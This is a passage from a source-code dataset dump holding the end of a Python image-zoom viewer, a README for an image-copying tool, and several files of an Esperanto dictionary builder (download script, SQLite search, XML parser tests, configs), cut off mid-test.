zoom_in(self):\n \"\"\"Make the image bigger up to actual size\"\"\"\n if self.scale_idx > 0:\n self.scale_idx -= 1\n self.show_image()\n\n def zoom_out(self):\n \"\"\"Make image smaller down to size of canvas\"\"\"\n if self.scale_idx < (len(self.scale_range) - 1):\n self.scale_idx = self.scale_idx + 1\n self.show_image()\n\n def zoom(self, event):\n '''Resize and display the image''' \n if event.delta == 120: # Mouse wheel up\n self.zoom_in()\n if event.delta == -120: # mouse wheel down\n self.zoom_out()\n\n #self.canvas.scale( \n # 'all',\n # self.canvas.canvasx(event.x),\n # self.canvas.canvasy(event.y),\n # self.scale_range[self.scale_idx], \n # self.scale_range[self.scale_idx]\n # )\n\n def show_image(self):\n \"\"\"Show image on the canvas\"\"\"\n if self.image_id:\n self.canvas.delete(self.image_id)\n\n width, height = self.image.size\n cw = self.canvas.winfo_width()\n ch = self.canvas.winfo_height()\n\n nw = int(width * self.scale_range[self.scale_idx])\n nh = int(height * self.scale_range[self.scale_idx])\n self.imagetk = ImageTk.PhotoImage(\n self.image.resize( (nw, nh), Image.ANTIALIAS )\n )\n\n ow = (cw - nw) / 2 if nw < cw else 0\n oh = (ch - nh) / 2 if nh < ch else 0\n\n self.image_id = self.canvas.create_image(ow , oh, image=self.imagetk, anchor='nw')\n self.canvas.configure(scrollregion=self.canvas.bbox('all'))\n\n\n def calc_scale_range(self, size):\n width, height = size\n cw = self.canvas.winfo_width()\n ch = self.canvas.winfo_height()\n\n if height < ch and width < cw:\n self.scale_range = [ 1.0 ]\n else:\n wratio = float(cw) / width\n hratio = float(ch) / height\n min_scale = round( min(wratio, hratio), 4)\n self.scale_range = invfrange(1.0, min_scale, 0.2)\n self.scale_idx = len(self.scale_range) - 1\n\n def resize(self, event):\n self.calc_scale_range(self.image.size)\n self.scale_idx = len(self.scale_range)-1\n self.show_image()\n\n def get_zoom(self):\n return int( self.scale_range[ self.scale_idx ] * 100.0 )\n\n \ndef main():\n root = Tk()\n root.title(\"Image Zoom\")\n im = ImageCanvas(root)\n im.load_image(\"./TestImage.jpg\")\n root.mainloop()\n\nif __name__ == \"__main__\":\n main()\n" }, { "alpha_fraction": 0.7471655607223511, "alphanum_fraction": 0.7471655607223511, "avg_line_length": 45.421051025390625, "blob_id": "3c2c132bed92bb2d4ba845328b05b3da7f86664e", "content_id": "09e4a061e47c0e6048a3fc0162abbddf809fa0cc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 882, "license_type": "no_license", "max_line_length": 101, "num_lines": 19, "path": "/README.md", "repo_name": "peverett/ImageCopy", "src_encoding": "UTF-8", "text": "# ImageCopy\n\nCopy image files from a memory card or USB stick that conform to the [Design \nrule for Camera File System (DCF)](https://en.wikipedia.org/wiki/Design_rule_for_Camera_File_system).\n\nThat means that\n* Images will be under a 'DCIM' folder (**D**igital **C**amera **IM**ages).\n* Images will be in [JPEG](https://en.wikipedia.org/wiki/JPEG) format.\n* Images will contain [EXIF](https://en.wikipedia.org/wiki/Exif) data.\n\nThe application will allow the user to:\n* Allow the user to define a default local path to copy the image to\n* Allow the user to rename the file automatically when copied to contain the \n date and time the image was taken, taken from the EXIF data of the image.\n* Allow the user to go through the images one at a time, selectively copying \n an image at a time. \n* Allow the user to append to the new filename\n\nApplication to be implemented in Python.\n" } ]
3
djuretic/praktika-vortaro-dicts
https://github.com/djuretic/praktika-vortaro-dicts
4c5f144f5df80e86b4b7bf312acbf14be0c3d6ce
6e60e36dea4f6b11aeb8067034f4fd37a5cd346f
09976da084c52818c3663b82bd714793dcb66d2d
refs/heads/master
2022-12-20T17:23:35.658888
2022-12-16T19:09:32
2022-12-16T19:09:32
113,715,278
1
0
null
2017-12-10T01:59:06
2022-12-05T15:08:20
2022-12-05T15:13:08
Python
[ { "alpha_fraction": 0.7323943376541138, "alphanum_fraction": 0.7323943376541138, "avg_line_length": 27.399999618530273, "blob_id": "d80598885b3f82552d2ef0d8918c90f465692a07", "content_id": "349a945fae8e9066bf8491a89910c05c624b99e4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 142, "license_type": "no_license", "max_line_length": 47, "num_lines": 5, "path": "/wrapper.py", "repo_name": "djuretic/praktika-vortaro-dicts", "src_encoding": "UTF-8", "text": "# For profiling with Scalene:\n# scalene wrapper.py process_revo\nfrom runpy import run_module\n\nrun_module(\"eo_dicts.cli\", run_name=\"__main__\")\n" }, { "alpha_fraction": 0.7441613674163818, "alphanum_fraction": 0.747346043586731, "avg_line_length": 57.875, "blob_id": "568f9d9ff2a1c164c1aa668e4d2b755c38811092", "content_id": "cdf54b88ebb3596902633b72984c22dc69939a44", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 942, "license_type": "no_license", "max_line_length": 124, "num_lines": 16, "path": "/download_revo.sh", "repo_name": "djuretic/praktika-vortaro-dicts", "src_encoding": "UTF-8", "text": "#/usr/bin/env bash\nset -o errexit\nset -o nounset\nZIP_URL=$(lynx -nonumbers -dump -listonly https://github.com/revuloj/revo-fonto/tags | grep \"tags/\" | grep \"zip\" | head -n1)\nwget -O revoxml.zip $ZIP_URL\n# this will include trailing slash\nZIP_ROOT_DIR=$(unzip -l revoxml.zip | sed -n \"5p\" | awk -F\" \" '{print $4}')\nrm -rf revo/xml\nunzip -jo revoxml.zip \"${ZIP_ROOT_DIR}revo/*\" -d \"revo/xml/\"\n\nwget -O revo/dtd/vokomll.dtd https://raw.githubusercontent.com/revuloj/voko-grundo/master/dtd/vokomll.dtd\nwget -O revo/dtd/vokourl.dtd https://raw.githubusercontent.com/revuloj/voko-grundo/master/dtd/vokourl.dtd\nwget -O revo/dtd/vokosgn.dtd https://raw.githubusercontent.com/revuloj/voko-grundo/master/dtd/vokosgn.dtd\nwget -O revo/cfg/lingvoj.xml https://raw.githubusercontent.com/revuloj/voko-grundo/master/cfg/lingvoj.xml\nwget -O revo/cfg/fakoj.xml https://raw.githubusercontent.com/revuloj/voko-grundo/master/cfg/fakoj.xml\ndate +%F > revo/VERSION\n" }, { "alpha_fraction": 0.6760563254356384, "alphanum_fraction": 0.7323943376541138, "avg_line_length": 23, "blob_id": "ea4472238a5b1adfc0b0bf3cd44593d96299215f", "content_id": "490d7e10b5280b0845e026c6b9f2dc12ea6cab5c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "INI", "length_bytes": 71, "license_type": "no_license", "max_line_length": 40, "num_lines": 3, "path": "/.flake8", "repo_name": "djuretic/praktika-vortaro-dicts", "src_encoding": "UTF-8", "text": "# still no support for pyproject.toml :(\n[flake8]\nmax-line-length = 102" }, { "alpha_fraction": 0.5610134601593018, "alphanum_fraction": 0.5667011141777039, "avg_line_length": 28.75384521484375, "blob_id": "322586182a46eae7c0d524fe7d2dbd18d12bcf09", "content_id": "2f68cff394f26cd66492f9d8be21f0a7c0d5bd4d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1934, "license_type": "no_license", "max_line_length": 71, "num_lines": 65, "path": "/eo_dicts/search.py", "repo_name": "djuretic/praktika-vortaro-dicts", "src_encoding": "UTF-8", "text": "import sqlite3\nimport os\nimport humanize\nfrom .utils import output_dir\n\n\ndef search_multiple(*words: str) -> None:\n for word in words:\n search(word)\n\n\ndef search(word: str) -> None:\n db_filename = os.path.join(output_dir(), \"vortaro.db\")\n conn = sqlite3.connect(db_filename)\n conn.row_factory = sqlite3.Row\n cursor = conn.cursor()\n try:\n for row in cursor.execute(\n \"\"\"\n SELECT *\n FROM words w\n LEFT JOIN definitions d ON (w.definition_id = d.id)\n WHERE word = ?\n \"\"\",\n (word,),\n ):\n for field, value in dict(row).items():\n print(\"%s: %s\" % (field, repr(value)))\n print(\"\")\n finally:\n cursor.close()\n conn.close()\n\n\ndef stats() -> None:\n db_filename = os.path.join(output_dir(), \"vortaro.db\")\n conn = sqlite3.connect(db_filename)\n conn.row_factory = sqlite3.Row\n cursor = conn.cursor()\n try:\n cursor.execute(\"SELECT * FROM version\")\n print(\"Version:\", cursor.fetchone()[0])\n\n file_size = os.path.getsize(db_filename)\n print(\"Size:\", humanize.naturalsize(file_size), \"-\", file_size)\n\n cursor.execute(\"SELECT COUNT(*) FROM words\")\n print(\"Words:\", cursor.fetchone()[0])\n\n cursor.execute(\"SELECT COUNT(*) FROM definitions\")\n print(\"Definitions:\", cursor.fetchone()[0])\n\n cursor.execute(\"SELECT COUNT(*) FROM languages\")\n print(\"Languages:\", cursor.fetchone()[0])\n\n cursor.execute(\"SELECT COUNT(*) FROM translations_es\")\n translations_es = cursor.fetchone()[0]\n cursor.execute(\"SELECT COUNT(*) FROM translations_en\")\n translations_en = cursor.fetchone()[0]\n print(\"Translations:\")\n print(\"\\tEnglish:\", translations_en)\n print(\"\\tSpanish:\", translations_es)\n finally:\n cursor.close()\n conn.close()\n" }, { "alpha_fraction": 0.7641128897666931, "alphanum_fraction": 0.7641128897666931, "avg_line_length": 16.13793182373047, "blob_id": "e68106ea9027004b8ad126d532f01ba0a93cd0ff", "content_id": "a962ceac7cd4cd4872247e4e8fe11977672fbd17", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 496, "license_type": "no_license", "max_line_length": 73, "num_lines": 29, "path": "/README.md", "repo_name": "djuretic/praktika-vortaro-dicts", "src_encoding": "UTF-8", "text": "# Dictionary files for Praktika Vortaro\n\n## Generating the database\n\nInstall the dependencies, download the dictionary files and process them:\n\n```bash\ngit submodule init && git submodule update\npip install pipenv\npipenv install\n# if using pyenv\npyenv rehash\npraktika_vortaro process_revo\n```\n\nThis will generate the sqlite database `output/vortaro.db`.\n\nTo download the most recent data files from Revo:\n\n```bash\n./download_revo.sh\npraktika_vortaro process_revo\n```\n\n## Tests\n\n```bash\npytest\n```" }, { "alpha_fraction": 0.5308510661125183, "alphanum_fraction": 0.5356382727622986, "avg_line_length": 25.478872299194336, "blob_id": "266a67b7254d3f3c66b9b717a53e8b92bd617e29", "content_id": "3d453e3766010eacc9030dbc6ba8da3afc3f2e36", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1900, "license_type": "no_license", "max_line_length": 84, "num_lines": 71, "path": "/eo_dicts/utils.py", "repo_name": "djuretic/praktika-vortaro-dicts", "src_encoding": "UTF-8", "text": "import xml.etree.ElementTree as ET\nimport os\nfrom typing import Optional, Iterator, TypeVar, Iterable\n\nT = TypeVar(\"T\")\n\nMAPPING = {\n \"C\": \"Ĉ\",\n \"G\": \"Ĝ\",\n \"H\": \"Ĥ\",\n \"J\": \"Ĵ\",\n \"S\": \"Ŝ\",\n \"U\": \"Ŭ\",\n \"c\": \"ĉ\",\n \"g\": \"ĝ\",\n \"h\": \"ĥ\",\n \"j\": \"ĵ\",\n \"s\": \"ŝ\",\n \"u\": \"ŭ\",\n}\n\n\ndef add_hats(word: str) -> str:\n if not word or len(word) == 1:\n return word\n res = \"\"\n pos = 0\n while pos < len(word) - 1:\n char = word[pos]\n if char in MAPPING.keys() and word[pos + 1] in (\"x\", \"X\"):\n res += MAPPING[char]\n pos += 2\n else:\n res += char\n pos += 1\n if pos == len(word) - 1:\n res += word[-1]\n return res\n\n\ndef get_languages() -> list[dict[str, Optional[str]]]:\n base_dir = os.path.dirname(__file__)\n xml_path = os.path.join(base_dir, \"..\", \"revo\", \"cfg\", \"lingvoj.xml\")\n tree = ET.parse(xml_path)\n langs = tree.findall(\"lingvo\")\n alphabet = \"abcĉdefgĝhĥijĵklmnoprsŝtuŭvz/-\"\n # normal sort puts ĉ, ĝ,... at the end\n langs = sorted(langs, key=lambda x: [alphabet.index(c) for c in (x.text or \"\")])\n return [{\"code\": lang.get(\"kodo\"), \"name\": lang.text} for lang in langs]\n\n\ndef get_disciplines() -> dict[str, Optional[str]]:\n base_dir = os.path.dirname(__file__)\n xml_path = os.path.join(base_dir, \"..\", \"revo\", \"cfg\", \"fakoj.xml\")\n tree = ET.parse(xml_path)\n return {node.get(\"kodo\") or \"\": node.text for node in tree.findall(\"fako\")}\n\n\ndef list_languages() -> None:\n langs = get_languages()\n for n, lang in enumerate(langs, 1):\n print(n, lang[\"code\"], lang[\"name\"])\n\n\ndef letter_enumerate(iterable: Iterable[T]) -> Iterator[tuple[str, T]]:\n for n, elem in enumerate(iterable):\n yield (chr(ord(\"a\") + n), elem)\n\n\ndef output_dir() -> str:\n return os.path.join(os.path.dirname(__file__), \"..\", \"output\")\n" }, { "alpha_fraction": 0.5387977957725525, "alphanum_fraction": 0.5420765280723572, "avg_line_length": 19.795454025268555, "blob_id": "3559544a225c1b8d658f79c134eea1a9cee344c5", "content_id": "fa177cdcebbe197e0752a2befe86fce12ec0cabd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 915, "license_type": "no_license", "max_line_length": 47, "num_lines": 44, "path": "/eo_dicts/cli.py", "repo_name": "djuretic/praktika-vortaro-dicts", "src_encoding": "UTF-8", "text": "import fire\nfrom . import process_revo\nfrom .utils import list_languages\nfrom .search import search_multiple, stats\nfrom typing import Optional\n\n\nclass Vortaro(object):\n def show_languages(self):\n list_languages()\n\n def search(self, *words: str):\n search_multiple(*words)\n\n def stats(self):\n stats()\n\n def process_revo(\n self,\n word: Optional[str] = None,\n xml_file: Optional[str] = None,\n output_db: str = \"vortaro.db\",\n limit: Optional[int] = None,\n verbose: bool = False,\n dry_run: bool = False,\n min_entries_to_include_lang: int = 100,\n ):\n process_revo.main(\n word,\n xml_file,\n output_db,\n limit,\n verbose,\n dry_run,\n min_entries_to_include_lang,\n )\n\n\ndef main():\n fire.Fire(Vortaro)\n\n\nif __name__ == \"__main__\":\n main()\n" }, { "alpha_fraction": 0.4915655553340912, "alphanum_fraction": 0.49906283617019653, "avg_line_length": 28.297687530517578, "blob_id": "e9da4afe2b905f73a6bb6a593aa47fdd916c49f7", "content_id": "ee24420fdfe0670572021caec37d8b4b5ac6e838", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 10175, "license_type": "no_license", "max_line_length": 102, "num_lines": 346, "path": "/eo_dicts/tests/test_parser.py", "repo_name": "djuretic/praktika-vortaro-dicts", "src_encoding": "UTF-8", "text": "from ..parser.revo import Art, Snc, Dif, Drv, Subart, Refgrp\nfrom lxml import etree\nimport pytest\n\n\[email protected]\ndef parser():\n return lambda xml: etree.fromstring(xml)\n\n\ndef test_set_parent(parser):\n xml = \"\"\"<art>\n <kap>-<rad>aĉ</rad>/</kap>\n <subart>\n <drv><kap>-<tld/></kap></drv>\n </subart>\n </art>\"\"\"\n art = Art(parser(xml))\n for tag in art.children:\n assert tag.parent == art\n\n\ndef test_article_kap(parser):\n xml = \"\"\"<art>\n <kap>\n <ofc>1</ofc>\n -<rad>aĉ</rad>/ <fnt><bib>PV</bib></fnt>\n </kap>\n </art>\"\"\"\n assert Art(parser(xml)).kap == (\"aĉ\", \"/\")\n\n\ndef test_article_no_drv(parser):\n xml = \"\"\"<art>\n <kap><rad>al</rad></kap>\n <subart>\n <dif>Prefikso kun la senco <tld/><sncref ref=\"al.0.prep_proksimigxo\"/></dif>:\n <snc ref=\"al.0.prep_proksimigxo\">\n <ekz><ind><tld/>veni</ind>, <tld/>kuri <tld/>porti, <tld/>esti.</ekz>\n </snc>\n </subart>\n </art>\"\"\"\n derivs = list(Art(parser(xml)).derivations())\n assert len(derivs) == 1\n assert derivs[0].__class__ is Subart\n parsed = derivs[0].to_text()\n assert (\n parsed.string == \"Prefikso kun la senco al: \\nalveni, alkuri alporti, alesti.\"\n )\n assert parsed.format == {\n \"ekz\": [(27, 58)],\n \"tld\": [(27, 29), (35, 37), (42, 44), (51, 53)],\n }\n\n\ndef test_drv_multiple_kap(parser):\n xml = \"\"\"<drv mrk=\"ajn.sen0a\"><kap>sen <tld/>a, <var><kap>sen ia <tld/></kap></var></kap></drv>\"\"\"\n assert Drv(parser(xml), {\"radix\": \"ajn\"}).kap == \"sen ajna, sen ia ajn\"\n\n\ndef test_drv_kap(parser):\n xml = '<drv mrk=\"a1.0.volvita\"><kap><tld/> volvita</kap></drv>'\n assert Drv(parser(xml), {\"radix\": \"a\"}).kap == \"a volvita\"\n\n\ndef test_drv_main_word_multiple(parser):\n xml = '<drv mrk=\"abort.0ajxo\"><kap><tld/>aĵo, <var><kap><tld/>ulo</kap></var></kap></drv>'\n assert Drv(parser(xml), {\"radix\": \"abort\"}).main_word() == \"abortaĵo, abortulo\"\n\n\ndef test_drv_whitespace_after_gra_and_ref(parser):\n xml = \"\"\"<drv mrk=\"abol.0i\">\n <kap><tld/>i</kap>\n <gra><vspec>tr</vspec></gra>\n <snc mrk=\"abol.0i.JUR\">\n <uzo tip=\"fak\">JUR</uzo>\n <ref tip=\"dif\" cel=\"abolic.0i\">abolicii</ref>\n <ekz>\n sklaveco estis <tld/>ita en Brazilo en 1888.\n </ekz>\n </snc>\n </drv>\"\"\"\n assert (\n Drv(parser(xml), {\"radix\": \"abol\"}).to_text().string\n == \"(tr) JUR = abolicii \\nsklaveco estis abolita en Brazilo en 1888. \"\n )\n\n\ndef test_subdrv(parser):\n xml = \"\"\"<drv mrk=\"ad.0\">\n <kap><ofc>*</ofc>-<tld/></kap>\n <dif>Sufikso esprimanta ĝenerale la agon kaj uzata por derivi:</dif>\n <subdrv>\n <dif>\n substantivojn:\n </dif>\n </subdrv>\n </drv>\"\"\"\n assert (\n Drv(parser(xml), {\"radix\": \"ad\"}).to_text().string\n == \"Sufikso esprimanta ĝenerale la agon kaj uzata por derivi:\\n\\nA. substantivojn: \"\n )\n\n\ndef test_subdrv_snc(parser):\n xml = \"\"\"<drv mrk=\"ir.0ado\">\n <kap><tld/>ado, <var><kap><tld/>o</kap></var></kap>\n <subdrv>\n <dif>\n Ago <tld/>i:\n </dif>\n <snc mrk=\"ir.0ado.deAL\"><ekz>Frazo</ekz></snc>\n <snc mrk=\"ir.0ado.al\"><ekz>Alia frazo</ekz></snc>\n </subdrv>\n <subdrv><dif>Maniero (...)</dif></subdrv>\n </drv>\n \"\"\"\n assert (\n Drv(parser(xml), {\"radix\": \"ir\"}).to_text().string\n == \"A. Ago iri: \\n\\n1. \\nFrazo\\n\\n2. \\nAlia frazo\\n\\nB. Maniero (...)\"\n )\n\n\ndef test_snc_single(parser):\n xml = \"\"\"<snc mrk=\"abak.0o.ARKI\">\n <uzo tip=\"fak\">ARKI</uzo>\n <dif>\n Supera plata parto de kolona\n <ref tip=\"vid\" cel=\"kapite.0o\">kapitelo</ref>.\n </dif>\n </snc>\"\"\"\n assert (\n Snc(parser(xml)).to_text().string\n == \"ARKI Supera plata parto de kolona kapitelo. \"\n )\n\n\ndef test_snc_no_tail_after_tld(parser):\n assert (\n Snc(parser('<snc mrk=\"abat.0o\"><dif><tld/></dif></snc>'), {\"radix\": \"abat\"})\n .to_text()\n .string\n == \"abat\"\n )\n\n\ndef test_snc_ignore_fnt(parser):\n xml = (\n '<snc mrk=\"-\"><dif>Difino <ekz>Frazo<fnt><aut>Iu</aut></fnt>.</ekz></dif></snc>'\n )\n assert Snc(parser(xml)).to_text().string == \"Difino \\nFrazo.\"\n\n\ndef test_snc_ignore_trd(parser):\n xml = '<snc mrk=\"-\"><dif>Difino <ekz><ind>Frazo</ind>.<trd lng=\"hu\">Trd</trd></ekz></dif></snc>'\n tag = Snc(parser(xml)).to_text()\n assert tag.string == \"Difino \\nFrazo.\"\n assert tag.format == {\"ekz\": [(8, 14)]}\n\n\ndef test_snc_replace_tld(parser):\n xml = \"\"\"<snc mrk=\"abat.0o\">\n <dif>Monaĥejestro de <tld/>ejo.</dif>\n </snc>\"\"\"\n assert (\n Snc(parser(xml), {\"radix\": \"abat\"}).to_text().string\n == \"Monaĥejestro de abatejo.\"\n )\n\n\ndef test_snc_replace_tld_lit(parser):\n xml = \"\"\"<snc mrk=\"abat.0o\">\n <dif>Monaĥejestro de <tld lit=\"A\"/>ejo.</dif>\n </snc>\"\"\"\n assert (\n Snc(parser(xml), {\"radix\": \"abat\"}).to_text().string\n == \"Monaĥejestro de Abatejo.\"\n )\n\n\ndef test_snc_whitespace(parser):\n xml = \"\"\"<snc>\n <dif>\n Amata:\n <ekz>\n <tld/>a patrino;\n </ekz>\n <ekz>\n nia <ind><tld/>memora</ind> majstro\n </ekz>\n </dif></snc>\n \"\"\"\n assert (\n Snc(parser(xml), {\"radix\": \"kar\"}).to_text().string\n == \"Amata: \\nkara patrino; \\nnia karmemora majstro \"\n )\n\n\ndef test_snc_no_more_whitespace_after_ref(parser):\n xml = \"\"\"<snc>\n <dif>\n <ref tip=\"lst\" cel=\"famili.0o.BIO\"\n lst=\"voko:zoologiaj_familioj\">Familio</ref> el la ordo\n <ref tip=\"malprt\" cel=\"best.rabo0oj\">rabobestoj</ref>\n (<trd lng=\"la\">Canidae</trd>).\n </dif>\n </snc>\"\"\"\n assert (\n Snc(parser(xml), {\"radix\": \"hunded\"}).to_text().string\n == \"Familio el la ordo rabobestoj (Canidae). \"\n )\n\n\ndef test_subsnc(parser):\n xml = \"\"\"<snc mrk=\"-\">\n <dif>Uzata kiel:</dif>\n <subsnc><dif>A</dif></subsnc>\n <subsnc><dif>B</dif></subsnc>\n </snc>\"\"\"\n assert Snc(parser(xml)).to_text().string == \"Uzata kiel:\\n\\na) A\\n\\nb) B\"\n\n\ndef test_multiple_snc(parser):\n xml = \"\"\"<art>\n <kap><rad>zon</rad>/o</kap>\n <drv mrk=\"zon.0o\">\n <kap><ofc>*</ofc><tld/>o</kap>\n <snc mrk=\"zon.0o.TEKS\"><dif>A</dif></snc>\n <snc mrk=\"zon.0o.korpo\"><dif>B</dif></snc>\n </drv>\n </art>\n \"\"\"\n drvs = [d.to_text().string for d in Art(parser(xml)).derivations()]\n assert drvs == [\"1. A\\n\\n2. B\"]\n\n\ndef test_dif_space_between_elements(parser):\n xml = \"\"\"<dif>\n <ref tip=\"dif\" cel=\"fin.0ajxo.GRA\">Finaĵo</ref>\n (lingvoscience: sufikso)\n </dif>\"\"\"\n assert Dif(parser(xml)).to_text().string == \"Finaĵo (lingvoscience: sufikso) \"\n\n\ndef test_trd_inside_ekz(parser):\n xml = \"\"\"<art>\n <kap><rad>abstin</rad>/i</kap>\n <drv mrk=\"abstin.0i\">\n <kap><tld/>i</kap>\n <gra><vspec>ntr</vspec></gra>\n <snc>\n <dif>Trinki ion pro medicina motivo:\n <ekz>\n <ind><tld/>ulo</ind>;\n <trd lng=\"ca\">abstinent<klr> (subst.)</klr></trd>\n <trdgrp lng=\"hu\">\n <trd>absztinens</trd>,\n <trd>önmegtartóztatás;</trd>\n </trdgrp>\n <trd lng=\"es\">abstemio</trd>\n </ekz>\n </dif>\n </snc>\n <trd lng=\"en\">abstain</trd>\n </drv>\n </art>\"\"\"\n derivs = list(Art(parser(xml)).derivations())\n assert len(derivs) == 1\n trds = derivs[0].translations()\n assert trds == {\n \"abstini\": {\"en\": {None: [\"abstain\"]}},\n # 'abstinulo': {\n # 'ca': ['abstinent (subst.)'],\n # 'hu': ['absztinens', 'önmegtartóztatás'],\n # 'es': ['abstemio']},\n }\n\n\ndef test_trd_preserves_whitespace(parser):\n # pl words come from abdiki\n xml = \"\"\"<drv mrk=\"telefo.posx0o\">\n <kap>poŝ<tld/>o</kap>\n <trdgrp lng=\"es\">\n <trd><klr tip=\"amb\">teléfono</klr> <ind>móvil</ind></trd>,\n <trd><klr tip=\"amb\">teléfono</klr> <ind>celular</ind></trd>\n </trdgrp>\n <trdgrp lng=\"pl\">\n <trd><klr>dać </klr>dymisję</trd>\n </trdgrp>\n </drv>\"\"\"\n drv = Drv(parser(xml), {\"radix\": \"telefon\"})\n trds = drv.translations()\n assert trds == {\n \"poŝtelefono\": {\n \"es\": {None: [\"teléfono móvil\", \"teléfono celular\"]},\n \"pl\": {None: [\"dać dymisję\"]},\n }\n }\n\n\ndef test_trd_inside_snc(parser):\n xml = \"\"\"<drv mrk=\"brik.0o\">\n <kap><ofc>*</ofc><tld/>o</kap>\n <snc mrk=\"brik.0o.bakita\">\n <trd lng=\"en\">brick</trd>\n </snc>\n <snc mrk=\"brik.0o.FIG_elemento\"></snc>\n <snc mrk=\"brik.0o.formo\">\n <trd lng=\"en\">block</trd>\n </snc>\n </drv>\"\"\"\n drv = Drv(parser(xml), {\"radix\": \"brik\"})\n trds = drv.translations()\n assert trds == {\"briko\": {\"en\": {1: [\"brick\"], 3: [\"block\"]}}}\n\n\ndef test_trd_inside_only_snc(parser):\n xml = \"\"\"<drv mrk=\"cxili.CX0o\">\n <kap><tld/>o</kap>\n <snc><trd lng=\"da\">Chile</trd></snc>\n </drv>\"\"\"\n drv = Drv(parser(xml), {\"radix\": \"cxili\"})\n assert drv.translations() == {\"ĉilio\": {\"da\": {None: [\"Chile\"]}}}\n\n\ndef test_trd_multiple_kap(parser):\n xml = \"\"\"<drv mrk=\"arab.SaudaA0ujo\">\n <kap>Sauda <tld lit=\"A\"/>ujo,\n <var><kap>Saud-<tld lit=\"A\"/>ujo</kap></var>,\n <var><kap>Saŭda <tld lit=\"A\"/>ujo</kap></var>\n </kap>\n <trd lng=\"pl\">Arabia Saudyjska</trd>\n </drv>\"\"\"\n drv = Drv(parser(xml), {\"radix\": \"arab\"})\n assert drv.translations() == {\n \"Sauda Arabujo, Saud-Arabujo, Saŭda Arabujo\": {\n \"pl\": {None: [\"Arabia Saudyjska\"]}\n }\n }\n\n\ndef test_refgrp_arrow(parser):\n xml = \"\"\"<refgrp tip=\"sin\">\n <ref cel=\"plagx.0o\">plaĝo</ref>\n </refgrp>\"\"\"\n assert Refgrp(parser(xml)).to_text().string == \"→ plaĝo\"\n" }, { "alpha_fraction": 0.5386819243431091, "alphanum_fraction": 0.5816618800163269, "avg_line_length": 14.863636016845703, "blob_id": "75907bf47cd911349858323dd1197a7fc0c37522", "content_id": "88122d1006725fe30927e78d4a3a7d675c5a5200", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "TOML", "length_bytes": 349, "license_type": "no_license", "max_line_length": 42, "num_lines": 22, "path": "/Pipfile", "repo_name": "djuretic/praktika-vortaro-dicts", "src_encoding": "UTF-8", "text": "[[source]]\nurl = \"https://pypi.org/simple\"\nverify_ssl = true\nname = \"pypi\"\n\n[packages]\nfire = \"*\"\nlxml = \"*\"\ntyping = \"*\"\neo-dicts = {editable = true, path = \".\"}\nhumanize = \"*\"\n\n[dev-packages]\nblack = \"==22.10.0\"\nipython = \"*\"\npytest = \"*\"\nmypy = \"*\"\n# https://github.com/psf/black/issues/2964\nclick = \"<=8.1.0\"\n\n[requires]\npython_version = \"3.11\"\n" }, { "alpha_fraction": 0.582004189491272, "alphanum_fraction": 0.6009629964828491, "avg_line_length": 26.016260147094727, "blob_id": "8cfb485e0afe18bfc085aebff5c60d0fb94577ac", "content_id": "5a07834ea387ee17059365a62f0970f49d3f0042", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3323, "license_type": "no_license", "max_line_length": 79, "num_lines": 123, "path": "/eo_dicts/tests/test_string_with_format.py", "repo_name": "djuretic/praktika-vortaro-dicts", "src_encoding": "UTF-8", "text": "from ..parser.string_with_format import StringWithFormat, Format, expand_tld\n\n\ndef test_init():\n string = StringWithFormat()\n assert string.string == \"\"\n assert string.format == {}\n\n\ndef test_add():\n string = StringWithFormat()\n string.add(\"Saluton\")\n assert string.string == \"Saluton\"\n string.add(\" mondo!\")\n assert string.string == \"Saluton mondo!\"\n\n\ndef test_add_format():\n string = StringWithFormat()\n string.add_italic(\"Saluton\")\n assert string.string == \"Saluton\"\n assert string.format == {\"italic\": [(0, 7)]}\n string.add_italic(\" mondo!\")\n assert string.string == \"Saluton mondo!\"\n assert string.format == {\"italic\": [(0, 14)]}\n\n\ndef test_add_format_final():\n string = StringWithFormat()\n string.add(\"Saluton\")\n assert string.string == \"Saluton\"\n string.add_italic(\" mondo!\")\n assert string.string == \"Saluton mondo!\"\n assert string.format == {\"italic\": [(7, 14)]}\n\n\ndef test_merge():\n string1 = StringWithFormat()\n string2 = StringWithFormat()\n string1.add_italic(\"N\")\n string2.add_italic(\"u\")\n string1.add(string2)\n assert string1.string == \"Nu\"\n assert string1.format == {\"italic\": [(0, 2)]}\n\n\ndef test_prepend():\n string = StringWithFormat()\n string.add_italic(\"mondo!\")\n assert string.format == {\"italic\": [(0, 6)]}\n string.prepend(\"Saluton \")\n assert string.string == \"Saluton mondo!\"\n assert string.format == {\"italic\": [(8, 14)]}\n\n\ndef test_strip_left():\n string = StringWithFormat()\n string.add_italic(\" Bonan tagon\")\n string = string.strip()\n assert string.string == \"Bonan tagon\"\n assert string.format == {\"italic\": [(0, 11)]}\n\n\ndef test_strip_right():\n string = StringWithFormat()\n string.add_italic(\"Bonan tagon \")\n string = string.strip()\n assert string.string == \"Bonan tagon\"\n assert string.format == {\"italic\": [(0, 11)]}\n\n\ndef test_join():\n s1 = StringWithFormat().add_italic(\"a\")\n s2 = StringWithFormat(\"b\")\n s3 = StringWithFormat().add_italic(\"c\")\n string = StringWithFormat.join([s1, s2, s3], \"-\")\n assert string.string == \"a-b-c\"\n assert string.format == {\"italic\": [(0, 1), (4, 5)]}\n\n\ndef test_encode_format():\n s = StringWithFormat().add_bold(\"Bonan\").add_italic(\" tagon\").add_bold(\"!\")\n assert s.encode_format() == \"bold:0,5;11,12\\nitalic:5,11\"\n\n\ndef test_expand_tld():\n s = StringWithFormat()\n s.add(\"amik\", Format.TLD).add(\"eco, ge\").add(\"patr\", Format.TLD).add(\"oj\")\n s = expand_tld(s)\n assert s.string == \"amikeco, gepatroj\"\n assert s.format == {\"tld\": [(0, 7), (9, 17)]}\n\n\ndef test_expand_tld_start():\n s = StringWithFormat()\n 